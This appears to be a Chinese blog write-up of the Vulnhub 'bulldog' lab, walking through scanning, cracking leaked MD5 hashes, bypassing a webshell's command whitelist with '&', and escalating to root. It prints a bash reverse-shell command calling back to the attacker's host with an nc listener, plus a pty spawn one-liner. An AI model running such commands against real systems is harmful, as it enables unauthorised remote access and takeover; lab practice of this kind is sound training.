Vulnhub----bulldog靶場筆記

前提條件

kali和bulldog靶機的的ip地址在同一個網段

本測試環境:
kali:192.168.56.102
bulldog:192.168.56.101python

主機探測

利用kali的netdiscover工具掃描靶機ip地址
imageweb

kali和bulldog靶機的的ip地址在同一個網段

本測試環境:
kali:192.168.56.102
bulldog:192.168.56.101shell

掃描靶機端口

利用kali的nmap工具掃描靶機ip地址瀏覽器

nmap -p- 192.168.56.101

image

掃描目標靶機端口的詳細服務信息bash

nmap -p23,80,8080 -A -T4 192.168.56.101

image

web服務是python2
用瀏覽器訪問192.168.56.101並未發現異常;接下來掃描網站
image
發現了 /dev /admin robots.txt
/admin 是一個登陸頁面,SQL注入並未成功
imagetcp

/robots.txt 並未發現異常
image工具

訪問/dev,發現了webshell鏈接,可是顯示須要驗證身份,可能須要先登陸纔能有權限使用此webshell
image學習

在註釋中發現了異常
image
MD5值加密,使用在線解密網站解密試試。
成功解密兩個帳號密碼:測試

  • nick---bulldog
  • sarah---bulldoglover
    使用其中一個用戶登陸成功,而後使用/dev/中的webshell
    image

白名單限制了使用的命令,經過&繞過
image網站

  • 如今可使用echo 'bash -i >& /dev/tcp/192.168.56.102/6666 0>&1'|bash反彈shell到kali上
  • kali上用nc偵聽6666端口nc -nvlp 6666
    image
    kali機成功得到反彈的shell

提權

使用普通用戶的權限並無發現要得到的信息,因而要提高root權限
在/home目錄下發現bulldogadmin文件夾,看文件名以爲裏面應該有東西
image
發現了隱藏文件夾,進去看看裏面的東西
image
使用cat命令沒有發現異常,使用strings發現下面了信息,去掉應該H是root密碼---> SUPERultimatePASSWORDyouCANTget
image
在得到的shell界面直接切換root用戶報錯
image
因而使用python腳本

python -c 'import pty; pty.spawn("/bin/bash")'

image
輸入剛纔獲取的密碼便可
image
成功獲取flag


後續技能學習:

  1. 反彈shell腳本,不單單限於bash方法
  2. python -c 'import pty; pty.spawn("/bin/bash")'此類經常使用的shell代碼
相關文章
相關標籤/搜索